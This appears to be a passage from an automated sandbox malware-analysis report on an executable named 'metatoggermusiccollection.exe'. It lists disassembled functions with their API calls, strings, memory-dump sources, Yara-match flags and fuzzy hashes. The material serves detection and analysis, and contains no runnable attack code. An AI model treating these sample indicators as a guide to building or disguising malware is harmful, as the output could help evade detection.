                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: bb5b86f82ca3d8b98a564dd8a8df8822a9c36fd24298fe90e22c3b91798721fb
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: 0D010D7244014AFBCF126F84DD82CEE3F67BB18364B488416FA1A59131DB36C5B2AB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02AD24A9
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD24B8
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD24CD
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD24D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 4018804020-0
                                                                            • Opcode ID: b0d48f422c510c95574c54cfcd4a2d4c60494ee6a6d48701aba998bf12aa8db8
                                                                            • Instruction ID: 708ff19d1aa99526c1106d1c11d2a8be71273ea98589b102b96f6842c3a266d3
                                                                            • Opcode Fuzzy Hash: b0d48f422c510c95574c54cfcd4a2d4c60494ee6a6d48701aba998bf12aa8db8
                                                                            • Instruction Fuzzy Hash: 25F01972540205AFDB40AFA9EC84F9ABBA8FF45710F004419FA05D6541DB75E561CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD2009
                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02AD2028
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD2037
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD204E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                            • String ID:
                                                                            • API String ID: 2456309408-0
                                                                            • Opcode ID: 30e22c63ac09cad37f5e5416df5046790aad07c6d024833cd2de121233846319
                                                                            • Instruction ID: 5fe3b11d4f47d2010f4d106d98e356a5f35b82ced203c375deb4ab72e1f80847
                                                                            • Opcode Fuzzy Hash: 30e22c63ac09cad37f5e5416df5046790aad07c6d024833cd2de121233846319
                                                                            • Instruction Fuzzy Hash: 5801AD718007048FC728AF94E9087AABBB4FF04709F00495DFA8682990CF79A949CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$H_prologSleep
                                                                            • String ID:
                                                                            • API String ID: 1765829285-0
                                                                            • Opcode ID: e866e427aa5de1f4ae65b97db395f79a073fc532ec717db83975a46da54e3b63
                                                                            • Instruction ID: 54165a46ed5929645f08615078f923c215a69579a7a886c0247b6e86426bace9
                                                                            • Opcode Fuzzy Hash: e866e427aa5de1f4ae65b97db395f79a073fc532ec717db83975a46da54e3b63
                                                                            • Instruction Fuzzy Hash: 78F05435A40110DFCB009FD4D8C8B88BBA4FF0D311F5081A9FB19DB290CB799855CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD9E88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmove
                                                                            • String ID: &'
                                                                            • API String ID: 3529519853-655172784
                                                                            • Opcode ID: ad90e95c7111bba2465a2c43198e6c875db2ac60cce0e9249c58fd9c925d62ee
                                                                            • Instruction ID: 9df862e49729e0caae82b3987542488345cf60fbee113322e095136c1fd9c09f
                                                                            • Opcode Fuzzy Hash: ad90e95c7111bba2465a2c43198e6c875db2ac60cce0e9249c58fd9c925d62ee
                                                                            • Instruction Fuzzy Hash: A9618E71D40219DFDF21DFA4CA80BEEBBB6AF48710F10416AD406AB181DF749A45CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004056B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $
                                                                            • API String ID: 1807457897-3032137957
                                                                            • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                            • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD959C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02AD8306,?,?,00000000), ref: 02AD9603
                                                                            • getsockname.WS2_32(?,?,?), ref: 02AD9619
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastgetsockname
                                                                            • String ID: &'
                                                                            • API String ID: 566540725-655172784
                                                                            • Opcode ID: 723d63950a27010ef93f18efb7996e4f64a23f0252f848309f1e0e451d1e5dcf
                                                                            • Instruction ID: 7c2d764a953e83937592303d178faa9acb066a7c5119b1f953d00ba3d7fb04fa
                                                                            • Opcode Fuzzy Hash: 723d63950a27010ef93f18efb7996e4f64a23f0252f848309f1e0e451d1e5dcf
                                                                            • Instruction Fuzzy Hash: 26215375A40208DBDB10DFA8D944ACEF7F5FF48314F11856AE919EB280DB34E9458B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADCBE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADCBE7
                                                                              • Part of subcall function 02ADD1C3: std::exception::exception.LIBCMT ref: 02ADD1F2
                                                                              • Part of subcall function 02ADD979: __EH_prolog.LIBCMT ref: 02ADD97E
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02ADD222: __EH_prolog.LIBCMT ref: 02ADD227
                                                                            Strings
                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02ADCC24
                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02ADCC1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                            • API String ID: 1953324306-1943798000
                                                                            • Opcode ID: 89e093cb15a74182ff57f9aaba8827bfc53ca591553b8bf6d0572a35080a97db
                                                                            • Instruction ID: bf5e36c9ad975c7efece11ac30da38ae9f513312b92d152cb8afb0ef42fd52c9
                                                                            • Opcode Fuzzy Hash: 89e093cb15a74182ff57f9aaba8827bfc53ca591553b8bf6d0572a35080a97db
                                                                            • Instruction Fuzzy Hash: B521CE71D41244AADB14EBE8DA54AAEFBB9EF18700F00048DE942A7280CF745A44CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADCCD7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADCCDC
                                                                              • Part of subcall function 02ADD29A: std::exception::exception.LIBCMT ref: 02ADD2C7
                                                                              • Part of subcall function 02ADDAB0: __EH_prolog.LIBCMT ref: 02ADDAB5
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02ADD2F7: __EH_prolog.LIBCMT ref: 02ADD2FC
                                                                            Strings
                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02ADCD19
                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02ADCD12
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                            • API String ID: 1953324306-412195191
                                                                            • Opcode ID: 941bd4e6acd3723e6f2b2edf599475566bc30de3ffd5251ea3086b5ed8f8f41b
                                                                            • Instruction ID: 10237f59c393c775168920d333269c9e8c7826239d4c690876e1c623107fc316
                                                                            • Opcode Fuzzy Hash: 941bd4e6acd3723e6f2b2edf599475566bc30de3ffd5251ea3086b5ed8f8f41b
                                                                            • Instruction Fuzzy Hash: CD21A071E802489BDF04EFE8D994AADFBB5EF15700F10018DE946A7280DF749A44CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02AD535D
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02AD536F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                            • String ID: \save.dat
                                                                            • API String ID: 4128168839-3580179773
                                                                            • Opcode ID: 86f3081f36beadeef0318135b5e2900bb412a3f063c7478388bb7be8f61dc3c0
                                                                            • Instruction ID: a8c566315e1001578c6ce9cb6288634fbd0e15c8ac545c22c946fd62d5371780
                                                                            • Opcode Fuzzy Hash: 86f3081f36beadeef0318135b5e2900bb412a3f063c7478388bb7be8f61dc3c0
                                                                            • Instruction Fuzzy Hash: C1113A729042447BEF229F658CD4A6FFF6BDF82750B5401E9E84667202DEB31D07CAA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004044C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName
                                                                            • String ID: 6x$C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                            • API String ID: 514040917-879218402
                                                                            • Opcode ID: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                            • Instruction ID: a353362e766ed3f2c716cac6d89b577610a1520323eec6d1a1738d9fa524379f
                                                                            • Opcode Fuzzy Hash: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                            • Instruction Fuzzy Hash: B2115EB2900218BFD711EF99DD81CAB77BCEB45358B1100BBF605B3241E674AE148BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD396A
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD39C1
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02ADA551: __EH_prolog.LIBCMT ref: 02ADA556
                                                                              • Part of subcall function 02ADA551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02ADA565
                                                                              • Part of subcall function 02ADA551: __CxxThrowException@8.LIBCMT ref: 02ADA584
                                                                            Strings
                                                                            • Day of month is not valid for year, xrefs: 02AD39AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Day of month is not valid for year
                                                                            • API String ID: 1404951899-1521898139
                                                                            • Opcode ID: 1cff4b921e8b71cb538378002fd802bff6892377bd46ab7659c408c2f29ddce7
                                                                            • Instruction ID: 7e431bf97f765924a7a248b4efa9d4920f7082fafe3809afd43d2642b14da933
                                                                            • Opcode Fuzzy Hash: 1cff4b921e8b71cb538378002fd802bff6892377bd46ab7659c408c2f29ddce7
                                                                            • Instruction Fuzzy Hash: 15012476910209AECF04EFE4C900AEEBB79FF14710F40801AFD0693200EF388A44CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADB033 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • std::exception::exception.LIBCMT ref: 02ADFA4A
                                                                            • __CxxThrowException@8.LIBCMT ref: 02ADFA5F
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 4063778783-2104205924
                                                                            • Opcode ID: d204cdb1ee5df56aec7e27857e2376550012c68ae8374c772d9dd6cb6ac8ac38
                                                                            • Instruction ID: 524feca06d9ddf5184295410c79343051751d2b7c97647ec12651fa83f9c5bbd
                                                                            • Opcode Fuzzy Hash: d204cdb1ee5df56aec7e27857e2376550012c68ae8374c772d9dd6cb6ac8ac38
                                                                            • Instruction Fuzzy Hash: 2BF0AE7064030E6ADF04EB94C9559AF73FDAF04315B800955FA27D3980EF70E6058594
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3C1B
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02AD3C30
                                                                              • Part of subcall function 02AE23F7: std::exception::exception.LIBCMT ref: 02AE2401
                                                                              • Part of subcall function 02ADA58A: __EH_prolog.LIBCMT ref: 02ADA58F
                                                                              • Part of subcall function 02ADA58A: __CxxThrowException@8.LIBCMT ref: 02ADA5B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID: bad cast
                                                                            • API String ID: 1300498068-3145022300
                                                                            • Opcode ID: 4c2c922528fce16af7f948a2990183011dcf7e48efe7f5f9f70b6771f8966bab
                                                                            • Instruction ID: 5cd64acaa581a852095b7141dc0bbf83041e750bd38e731976038204d5cde71c
                                                                            • Opcode Fuzzy Hash: 4c2c922528fce16af7f948a2990183011dcf7e48efe7f5f9f70b6771f8966bab
                                                                            • Instruction Fuzzy Hash: 3EF0A072D405049BCB09EF98D550AEAB775EF51311F0041AEFE065B240CF729A4ACEA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3886
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD38A5
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            Strings
                                                                            • Day of month value is out of range 1..31, xrefs: 02AD3894
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Day of month value is out of range 1..31
                                                                            • API String ID: 3258419250-1361117730
                                                                            • Opcode ID: 967ee712cb10efe1f38ec00b64f3adc10af4fcec059c638db13dd481712c1d7b
                                                                            • Instruction ID: 38949185c5cd6cc19133947c50fc8db4f11dc0c0385d7a47c47c4f95b506a654
                                                                            • Opcode Fuzzy Hash: 967ee712cb10efe1f38ec00b64f3adc10af4fcec059c638db13dd481712c1d7b
                                                                            • Instruction Fuzzy Hash: FCE0D872F80104ABE714BFD8CD11BDDBB75EB08710F40054AF50673680DEB929448BD5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD38CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD38D2
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD38F1
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            Strings
                                                                            • Year is out of valid range: 1400..10000, xrefs: 02AD38E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                            • API String ID: 3258419250-2344417016
                                                                            • Opcode ID: 9da0c49d53b745af5a2ed7b3e8368ea34870a0884a8eb49e2643769359373841
                                                                            • Instruction ID: 855b5eb5c2e96cb585f81ffb093cc24d6cd4097bedc6e82d8233cf130f2d10d6
                                                                            • Opcode Fuzzy Hash: 9da0c49d53b745af5a2ed7b3e8368ea34870a0884a8eb49e2643769359373841
                                                                            • Instruction Fuzzy Hash: E5E092B2E841049BE714EBD8C911BDDBB65EB08710F00054AE50267680DEB92944CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD391E
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD393D
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            Strings
                                                                            • Month number is out of range 1..12, xrefs: 02AD392C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Month number is out of range 1..12
                                                                            • API String ID: 3258419250-4198407886
                                                                            • Opcode ID: 8129f5749e1834de2549033138e33952e45528e16979569006380cef68d2fbcf
                                                                            • Instruction ID: 0dc1d7eb9a2b5e4cf0543a379a80fda5bfc92d89f17e3d468a4ab84c98274540
                                                                            • Opcode Fuzzy Hash: 8129f5749e1834de2549033138e33952e45528e16979569006380cef68d2fbcf
                                                                            • Instruction Fuzzy Hash: 14E0D872F801089BE718BFD8CD117DDB775EB08710F40054AF90267680DEB929448BD5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD19C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • TlsAlloc.KERNEL32 ref: 02AD19CC
                                                                            • GetLastError.KERNEL32 ref: 02AD19D9
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocErrorH_prologLast
                                                                            • String ID: tss
                                                                            • API String ID: 249634027-1638339373
                                                                            • Opcode ID: 2df644fd0b81031197e83cb32fdb194c06ae24e10bddadd74f13d7614a482b44
                                                                            • Instruction ID: b3a6e4ecda5f91c71550ad23db95a3e4d216d85d7f33ee95882878c608f84670
                                                                            • Opcode Fuzzy Hash: 2df644fd0b81031197e83cb32fdb194c06ae24e10bddadd74f13d7614a482b44
                                                                            • Instruction Fuzzy Hash: E8E08631D442149BC7007BB8DC0808BFBA49A40230F108B66FDBF836D0EF3489518BC6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3BD8
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02AD3BED
                                                                              • Part of subcall function 02AE23F7: std::exception::exception.LIBCMT ref: 02AE2401
                                                                              • Part of subcall function 02ADA58A: __EH_prolog.LIBCMT ref: 02ADA58F
                                                                              • Part of subcall function 02ADA58A: __CxxThrowException@8.LIBCMT ref: 02ADA5B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID: bad cast
                                                                            • API String ID: 1300498068-3145022300
                                                                            • Opcode ID: 15f1ddf81e5f9b38aa4ab0c7142dae8d81b65bb62a0cba4749bbf5bb7e8717e8
                                                                            • Instruction ID: 29300d27a888ae06363acb9455802de71a4d1cf212a7b36d0c1290fe5936a671
                                                                            • Opcode Fuzzy Hash: 15f1ddf81e5f9b38aa4ab0c7142dae8d81b65bb62a0cba4749bbf5bb7e8717e8
                                                                            • Instruction Fuzzy Hash: 97E09A709401089BCB04EF94D251BACBB71EF10300F4080A8EA0657280CF369906CE92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040395C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 3499195154-0
